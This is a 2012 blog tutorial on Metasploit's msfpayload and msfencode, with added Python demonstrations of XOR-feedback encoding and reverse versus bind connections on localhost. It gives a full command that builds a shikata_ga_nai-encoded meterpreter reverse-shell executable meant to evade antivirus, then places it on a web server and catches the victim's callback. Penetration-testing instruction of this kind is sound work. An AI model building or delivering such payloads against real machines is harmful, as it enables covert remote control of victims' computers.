Monday, February 27, 2012

MSFpayload & MSFencode

In this post I'll explain two more Metasploit features: msfpayload and msfencode. :)

- MsfPayload
msfpayload is the Metasploit tool for generating a payload, the code that runs on the target once an exploit succeeds. It does the same job as msfweb, which I used in my other posts, but from the console, so it is harder for newbies to use. With regular practice it beats msfweb, because it saves a lot of time and RAM. (Note for readers coming to this later: msfpayload and msfencode were retired from the framework in 2015 and msfvenom now does the work of both; the payload names and options used below are unchanged.)
# msfpayload -h


- MsfEncode
msfencode is the tool that re-encodes a payload: it transforms the raw payload bytes into a different byte sequence and prefixes a small decoder stub that restores and runs the original at run time, so the function stays the same while the bytes change. What the encoded output looks like depends on the encoder chosen. msfencode ships many encoders; the one I like best is x86/shikata_ga_nai, a polymorphic XOR encoder that picks a random key on every run, so encoding the same payload twice gives two different files. The encoder is normally applied to the payload that is sent and executed together with the exploit.
Why encode at all? Two reasons. The first is practical: many exploits cannot carry certain byte values (a null byte terminates a C string, for example), and an encoder lets you regenerate the payload until none of those "bad characters" appear (msfencode's -b option). The second is the one this post is about: antivirus software compares files against a database of known payload fingerprints, and if the raw payload's bytes match a signature the file is blocked before it can run. Encoding changes those bytes. The caveat a practitioner should keep in mind: the decoder stub itself is well known and shikata_ga_nai has had antivirus signatures for years, so encoding alone is not reliable evasion; treat it as the minimum, not as a guarantee.
# msfencode -h
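To make the paragraph above concrete, here is an added example (my own code, not part of the original post and not Metasploit's implementation) of the additive-feedback XOR scheme that shikata_ga_nai is built on, together with the bad-character retry loop that msfencode's -b option performs. The payload, the "signature" and the decoder stub bytes are constructed stand-ins, not real shellcode or real AV data; the point is to show why the encoded bytes no longer match a signature on the raw payload, and why the constant stub is what gets signatured instead.

```python
import os
import struct

# Constructed stand-in for a raw payload (NOT real shellcode): it deliberately
# contains null bytes and a recognisable string so the effects below are visible.
PAYLOAD = b"\x90\x90\x00MSF_SAMPLE_PAYLOAD\x00\xcc"
SIGNATURE = b"MSF_SAMPLE_PAYLOAD"          # what a naive AV signature on the raw payload looks for
DECODER_STUB = b"<constructed-decoder-stub>"  # stand-in for the fixed decoder routine that is prepended

MASK = 0xFFFFFFFF


def xor_feedback_encode(payload: bytes, key: int) -> bytes:
    """Additive-feedback XOR, the scheme behind x86/shikata_ga_nai: each
    32-bit block is XORed with the key, then the *encoded* block is added
    into the key, so every block after the first depends on all preceding
    output. The payload is padded to a 4-byte boundary with NOPs (0x90)."""
    data = payload + b"\x90" * (-len(payload) % 4)
    out = bytearray()
    for off in range(0, len(data), 4):
        block = struct.unpack("<I", data[off:off + 4])[0]
        enc = block ^ key
        out += struct.pack("<I", enc)
        key = (key + enc) & MASK
    return bytes(out)


def xor_feedback_decode(blob: bytes, key: int) -> bytes:
    """Mirror of the encoder; this is the work the decoder stub does at run time."""
    out = bytearray()
    for off in range(0, len(blob), 4):
        enc = struct.unpack("<I", blob[off:off + 4])[0]
        out += struct.pack("<I", enc ^ key)
        key = (key + enc) & MASK
    return bytes(out)


def encode_avoiding(payload: bytes, badchars: bytes, max_tries: int = 10000):
    """Try random keys until neither the key bytes (they are embedded in the
    stub) nor the encoded payload contain a bad character. This retry loop
    is what msfencode's -b option does for you."""
    for _ in range(max_tries):
        key = struct.unpack("<I", os.urandom(4))[0]
        blob = xor_feedback_encode(payload, key)
        candidate = struct.pack("<I", key) + blob
        if not any(b in candidate for b in badchars):
            return key, blob
    raise RuntimeError("no key found that avoids the bad characters")


def build_encoded(payload: bytes, badchars: bytes = b"\x00") -> bytes:
    """Layout of what ends up in the file: decoder stub + key + encoded payload."""
    key, blob = encode_avoiding(payload, badchars)
    return DECODER_STUB + struct.pack("<I", key) + blob


def signature_match(data: bytes, sig: bytes) -> bool:
    """The simplest possible AV check: a byte pattern anywhere in the file."""
    return sig in data


if __name__ == "__main__":
    encoded = build_encoded(PAYLOAD)
    print("raw payload matches signature:  ", signature_match(PAYLOAD, SIGNATURE))
    print("encoded file matches signature: ", signature_match(encoded, SIGNATURE))
    print("encoded file still carries stub:", signature_match(encoded, DECODER_STUB))
```

Run it twice and the encoded bytes differ each time while the decoded result is identical; the stub bytes, however, are the same in every output, which is exactly the part a signature writer targets.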

Here's an example of how to combine msfpayload and msfencode to create a malicious file that contains our payload:
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4321 R | msfencode -e x86/shikata_ga_nai -t exe > /var/www/files/cmd.exe

- What does the command above do?
msfpayload generates a windows/meterpreter/reverse_tcp payload that will call back to 192.168.56.1 on port 4321 and writes it out raw (the R argument). msfencode reads it from the pipe, encodes it with x86/shikata_ga_nai and wraps the result in a Windows executable (-t exe), written to /var/www/files/cmd.exe. The encoding changes the payload's bytes so a signature on the raw payload no longer matches; it does not make the file invisible to antivirus. The file then has to reach the victim's computer: over the web server it was written under, or with meterpreter, netcat, FTP, or any other channel. Whenever the victim runs the file, the payload inside it runs too.

- After that we only need to prepare the right way to handle the payload. With a reverse connection we are the server: we open a port and listen, and the victim connects out to us (this also works through NAT and outbound-only firewalls, which is why reverse payloads are the usual choice). With a bind connection we are the client: the payload opens a listening port on the victim and we connect to the victim's IP address.
In this post the payload is windows/meterpreter/reverse_tcp, so to handle it I only need to start a listener in Metasploit with the exploit/multi/handler module, with PAYLOAD, LHOST and LPORT set to exactly the values baked into the file (192.168.56.1 and 4321 here). Start the handler before the victim runs the file; if the values don't match, the victim's connection attempt fails silently and nothing shows up. Other payload types need other handlers.
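The two connection directions, and what happens when the handler's port does not match the one baked into the payload, as an added example that is not part of the original post and does not use Metasploit at all: the "victim" and the "attacker" are two threads on localhost, and the first bytes the payload sends are a constructed stand-in for a real stage request.

```python
import socket
import threading

HOST = "127.0.0.1"   # everything stays on localhost: victim and attacker are just two threads
BEACON = b"stage-request"  # constructed stand-in for whatever the real payload sends first


def _free_port() -> int:
    """Ask the OS for a currently unused TCP port."""
    with socket.socket() as s:
        s.bind((HOST, 0))
        return s.getsockname()[1]


def reverse_payload(lhost: str, lport: int) -> None:
    """Victim side of a reverse_tcp payload: connect OUT to LHOST:LPORT."""
    try:
        with socket.create_connection((lhost, lport), timeout=2) as c:
            c.sendall(BEACON)
    except OSError:
        pass  # nobody listening on that port: the payload just dies, nothing is logged


def run_reverse(handler_port: int, payload_port: int, timeout: float = 2.0):
    """Attacker side, the job of exploit/multi/handler for a reverse payload:
    listen on handler_port, then let a payload built with LPORT=payload_port run.
    Returns what the handler received, or None when the ports don't match."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((HOST, handler_port))
        srv.listen(1)
        srv.settimeout(timeout)
        victim = threading.Thread(target=reverse_payload, args=(HOST, payload_port))
        victim.start()           # handler is already up when the victim runs the file
        try:
            conn, _ = srv.accept()
        except socket.timeout:
            victim.join()
            return None
        with conn:
            data = conn.recv(len(BEACON))
        victim.join()
        return data


def bind_payload(rport: int, ready: threading.Event, timeout: float = 2.0) -> None:
    """Victim side of a bind_tcp payload: open a port on the victim and wait."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((HOST, rport))
        srv.listen(1)
        srv.settimeout(timeout)
        ready.set()
        try:
            conn, _ = srv.accept()
        except socket.timeout:
            return
        with conn:
            conn.sendall(BEACON)


def run_bind(payload_port: int, handler_port: int, timeout: float = 2.0):
    """Attacker side for a bind payload: we are the client and connect to
    RHOST:RPORT. Returns the beacon, or None when RPORT is not the payload's port."""
    ready = threading.Event()
    victim = threading.Thread(target=bind_payload, args=(payload_port, ready, timeout))
    victim.start()
    ready.wait(timeout)
    try:
        with socket.create_connection((HOST, handler_port), timeout=timeout) as c:
            data = c.recv(len(BEACON))
    except OSError:
        data = None
    victim.join()
    return data


if __name__ == "__main__":
    port = _free_port()
    print("reverse, matching ports:", run_reverse(port, port))
    print("bind, matching ports:   ", run_bind(port, port))
    print("reverse, wrong LPORT:   ", run_reverse(port, _free_port()))
```

The mismatch cases are the ones worth remembering: a reverse payload pointed at the wrong port fails on the victim with no trace on our side, and a handler that connects to the wrong bind port gets a refused connection. Both look like "the exploit didn't work" when the real cause is a handler option that doesn't match the file.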

Hope this helps you understand the Metasploit features, especially msfpayload and msfencode, a bit better.. ^_^v

"the quieter you become, the more you are able to hear.."
